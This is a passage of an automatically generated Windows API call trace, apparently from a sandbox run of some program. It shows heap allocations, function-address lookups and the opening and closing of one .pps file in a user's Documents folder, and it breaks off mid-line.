RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0036.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0036.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c808 [0036.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88c808, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0036.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0036.124] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0036.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0036.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0036.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0036.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0036.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0036.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0036.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps", cchWideChar=71, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 71 [0036.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x47) returned 0x88e138 [0036.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps", cchWideChar=71, lpMultiByteStr=0x88e138, cbMultiByte=71, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps", lpUsedDefaultChar=0x0) returned 71 [0036.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0036.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0036.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.125] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\d4y-2lnu.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0036.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0036.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0036.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0036.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0036.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0036.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0036.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0036.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0036.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0036.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0036.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0036.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=71, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0036.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8e) returned 0x7c38b0 [0036.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=71, lpWideCharStr=0x7c38b0, cchWideChar=71 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\d4Y-2lNU.pps") returned 71 [0036.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0036.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0036.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0036.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0036.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0036.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0036.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0036.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0036.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0036.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0036.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0036.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0036.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0036.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0036.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0036.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0036.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0036.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0036.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0036.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0036.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0036.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0036.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0036.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0036.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0036.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0036.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0036.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0036.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0036.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0036.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0036.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0036.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0036.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0036.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0036.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0036.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0036.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0036.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0036.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0036.128] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0036.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0036.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0036.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0036.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0036.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0036.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0036.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0036.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0036.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0036.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0036.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0036.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0036.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0036.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0036.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0036.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0036.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0036.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0036.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0036.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0036.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0036.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0036.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0036.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0036.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0036.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0036.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0036.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0036.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0036.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0036.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0036.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0036.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0036.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.129] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0036.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0036.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0036.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0036.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0036.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0036.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0036.129] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0036.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0036.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0036.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0036.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0036.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0036.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0036.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0036.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0036.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0036.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0036.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0036.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0036.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0036.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0036.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0036.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.130] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0036.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0036.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0036.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0036.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0036.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0036.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0036.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0036.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0036.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0036.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0036.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0036.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0036.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.131] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0036.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0036.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0036.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897d8 [0036.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x8897d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0036.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0036.131] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0036.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0036.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0036.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0036.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0036.131] CloseHandle (hObject=0x140) returned 1 [0036.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0036.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0036.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0036.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0036.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0036.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0036.132] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0036.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0036.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0036.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0036.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0036.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0036.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0036.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0036.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0036.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0036.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0036.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0036.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0036.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 